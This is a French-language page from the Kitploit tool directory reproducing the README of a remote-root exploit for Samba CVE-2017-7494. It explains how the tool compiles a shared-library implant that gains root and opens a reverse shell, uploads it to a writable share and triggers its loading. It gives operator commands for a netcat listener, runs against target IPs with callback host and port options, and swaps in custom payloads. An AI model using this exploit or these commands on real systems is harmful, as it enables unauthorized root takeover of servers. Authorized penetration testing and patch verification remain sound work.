Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/sudlit/cve-2017-7494
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionOutil d'Accès à Distance
GitHubsudlit/cve-2017-7494

CVE-2017-7494

Exploit racine à distance pour SAMBA CVE-2017-7494 qui compile une charge utile de bibliothèque partagée, la téléverse vers un partage accessible en écriture, et déclenche son chargement pour lancer un shell inversé en tant que root.

Voir le dépôt
1il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-7494

Exploit racine à distance pour la vulnérabilité SAMBA CVE-2017-7494.

Détails

Cet exploit est divisé en 2 parties :

  • Premièrement, il compile une charge utile appelée "implant.c" et génère une bibliothèque (libimplantx32.so ou libimplantx64.so) qui passe à l'utilisateur root, se détache du processus parent et génère un shell inversé.
  • Deuxièmement, il trouve un partage accessible en écriture sur l'hôte cible spécifié, téléverse la bibliothèque avec un nom aléatoire et tente de la charger.

Tant que la cible est vulnérable et que la charge utile est correcte pour le système d'exploitation et l'architecture de la cible, l'exploit est fiable à 100 %.

Comment faire

Sur votre machine, exécutez la commande suivante :

root@kitploit:~
$ nc -p 31337 -l

Ensuite, exécutez l'exploit contre votre cible et attendez qu'il se connecte en retour à votre Netcat :

root@kitploit:~
$ python cve_2017_7494.py -t target_ip

Si vous fermez trop rapidement le shell inversé, au lieu de relancer l'exploit et de téléverser à nouveau le module, etc... vous pouvez simplement indiquer le chemin du module qu'il a déjà téléversé. En supposant qu'il a été téléversé dans /shared/directory/ sous le nom "module.so", vous exécuteriez une commande comme celle-ci :

root@kitploit:~
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so

MISE À JOUR 11/25/2017 - Archivaldo

Vous pouvez désormais exécuter l'exploit contre Samba 3.5.0 et 3.6.0, il vous suffit d'ajouter l'argument -o 1.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 

Vous pouvez désormais utiliser votre propre .so personnalisé.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so

Si vous avez besoin d'exécuter ce script depuis une machine x86, la compilation des binaires de l'implant créera deux fichiers x86. En utilisant l'option -n 1, vous pouvez désactiver la compilation et copier libimplantx64.so depuis une autre machine.

root@kitploit:~
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

Si Samba n'écoute que sur le port 139, vous pouvez définir le port du serveur distant à l'aide de l'argument -p.

root@kitploit:~
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1

REMARQUES

Je n'en assure plus le support.

-- Joxean Koret

Télécharger l’outil